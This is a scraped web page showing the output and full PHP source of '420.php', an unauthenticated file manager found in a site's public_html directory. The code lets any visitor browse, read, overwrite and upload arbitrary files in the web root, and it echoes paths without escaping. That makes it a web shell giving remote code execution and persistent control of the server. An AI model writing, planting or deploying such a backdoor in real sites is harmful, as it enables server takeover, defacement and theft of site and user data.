Current directory: /home/advancloud/public_html

• [DIR] ..
• [FILE] .json.php | Edit
• [DIR] .well-known
• [FILE] 420.php | Edit
• [DIR] cgi-bin

File content: /home/advancloud/public_html/420.php

<?php
// Root directory
$root = __DIR__;

// Current directory
$dir = isset($_GET['dir']) ? realpath($root . '/' . $_GET['dir']) : $root;

// Prevent directory traversal
if (strpos($dir, $root) !== 0) {
    die("Access denied");
}

// List directory contents
$files = scandir($dir);
echo "<h2>Current directory: $dir</h2>";
echo "<ul>";
foreach ($files as $file) {
    if ($file === '.') continue;
    $path = $dir . '/' . $file;
    if (is_dir($path)) {
        echo "<li>[DIR] <a href='?dir=" . urlencode($_GET['dir'] . '/' . $file) . "'>$file</a></li>";
    } else {
        echo "<li>[FILE] <a href='?file=" . urlencode($path) . "'>$file</a> | <a href='?edit=" . urlencode($path) . "'>Edit</a></li>";
    }
}
echo "</ul>";

// File content view
if (isset($_GET['file'])) {
    $filePath = $_GET['file'];
    if (strpos(realpath($filePath), $root) === 0 && is_file($filePath)) {
        echo "<h3>File content: $filePath</h3>";
        echo "<pre>" . htmlspecialchars(file_get_contents($filePath)) . "</pre>";
    } else {
        echo "Cannot view this file";
    }
}

// File edit form
if (isset($_GET['edit'])) {
    $filePath = $_GET['edit'];
    if (strpos(realpath($filePath), $root) === 0 && is_file($filePath)) {
        if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['content'])) {
            file_put_contents($filePath, $_POST['content']);
            echo "File updated successfully: " . htmlspecialchars($filePath);
        }
        $content = htmlspecialchars(file_get_contents($filePath));
        echo "<h3>Edit file: $filePath</h3>";
        echo "<form method='post'>";
        echo "<textarea name='content' rows='20' cols='80'>$content</textarea><br>";
        echo "<input type='submit' value='Save'>";
        echo "</form>";
    } else {
        echo "Cannot edit this file";
    }
}

// File upload form
echo '<h3>Upload file</h3>';
echo '<form method="post" enctype="multipart/form-data">';
echo '<input type="file" name="upload">';
echo '<input type="submit" value="Upload">';
echo '</form>';

// Handle upload
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['upload'])) {
    $target = $dir . '/' . basename($_FILES['upload']['name']);
    if (move_uploaded_file($_FILES['upload']['tmp_name'], $target)) {
        echo "File uploaded successfully: " . htmlspecialchars($target);
    } else {
        echo "Upload failed";
    }
}
?>

Upload file